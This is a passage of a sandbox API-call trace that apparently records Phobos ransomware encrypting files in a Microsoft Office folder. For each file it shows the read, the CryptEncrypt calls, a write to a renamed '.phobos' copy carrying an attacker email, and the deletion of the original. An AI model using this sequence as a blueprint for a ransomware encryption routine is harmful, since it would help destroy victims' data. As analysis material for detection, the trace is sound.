lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb360, lpOverlapped=0x0) returned 1 [0168.535] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb370, dwBufLen=0xb370 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb370) returned 1 [0168.535] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb370, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb370, lpOverlapped=0x0) returned 1 [0168.537] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0168.537] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.537] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0168.537] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.537] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0168.537] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.537] CloseHandle (hObject=0x194) returned 1 [0168.537] CloseHandle (hObject=0x14c) returned 1 [0168.537] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll")) returned 1 [0168.544] SetEvent (hEvent=0xe8) returned 1 [0168.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0168.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.544] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=31584) returned 1 [0168.544] CloseHandle (hObject=0x14c) returned 1 [0168.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll")) returned 0x2020 [0168.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.545] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.545] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0168.545] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.545] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7b60, lpOverlapped=0x0) returned 1 [0169.034] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7b70, dwBufLen=0x7b70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7b70) returned 1 [0169.035] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7b70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7b70, lpOverlapped=0x0) returned 1 [0169.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0169.036] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.036] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.036] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0169.036] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.036] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.036] CloseHandle (hObject=0x14c) returned 1 [0169.036] CloseHandle (hObject=0x194) returned 1 [0169.036] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll")) returned 1 [0169.037] SetEvent (hEvent=0xe8) returned 1 [0169.037] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.037] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.038] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=252256) returned 1 [0169.038] CloseHandle (hObject=0x194) returned 1 [0169.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll")) returned 0x2020 [0169.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.038] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.038] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.039] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.039] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3d960, lpOverlapped=0x0) returned 1 [0169.186] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3d970, dwBufLen=0x3d970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3d970) returned 1 [0169.187] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3d970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3d970, lpOverlapped=0x0) returned 1 [0169.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.191] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.191] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.191] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.191] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.191] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.191] CloseHandle (hObject=0x194) returned 1 [0169.191] CloseHandle (hObject=0x14c) returned 1 [0169.191] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll")) returned 1 [0169.198] SetEvent (hEvent=0xe8) returned 1 [0169.198] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.198] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.198] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=219488) returned 1 [0169.198] CloseHandle (hObject=0x14c) returned 1 [0169.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll")) returned 0x2020 [0169.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.199] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.199] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.199] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.199] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x35960, lpOverlapped=0x0) returned 1 [0169.225] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x35970, dwBufLen=0x35970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x35970) returned 1 [0169.226] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x35970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x35970, lpOverlapped=0x0) returned 1 [0169.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.241] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.241] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.241] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.241] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.241] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.241] CloseHandle (hObject=0x14c) returned 1 [0169.241] CloseHandle (hObject=0x194) returned 1 [0169.241] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll")) returned 1 [0169.243] SetEvent (hEvent=0xe8) returned 1 [0169.243] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.243] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.243] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=652640) returned 1 [0169.243] CloseHandle (hObject=0x194) returned 1 [0169.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll")) returned 0x2020 [0169.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.244] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.244] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.244] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.244] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9f560, lpOverlapped=0x0) returned 1 [0169.357] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9f570, dwBufLen=0x9f570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9f570) returned 1 [0169.368] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9f570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9f570, lpOverlapped=0x0) returned 1 [0169.378] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.378] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.378] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.378] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.378] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.378] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.378] CloseHandle (hObject=0x194) returned 1 [0169.378] CloseHandle (hObject=0x14c) returned 1 [0169.379] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll")) returned 1 [0169.385] SetEvent (hEvent=0xe8) returned 1 [0169.385] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.388] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=11616) returned 1 [0169.388] CloseHandle (hObject=0x14c) returned 1 [0169.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll")) returned 0x2020 [0169.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.388] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.389] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.389] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.389] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.389] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2d60, lpOverlapped=0x0) returned 1 [0169.804] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2d70, dwBufLen=0x2d70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2d70) returned 1 [0169.804] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2d70, lpOverlapped=0x0) returned 1 [0169.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.805] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.805] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.805] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.805] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.805] 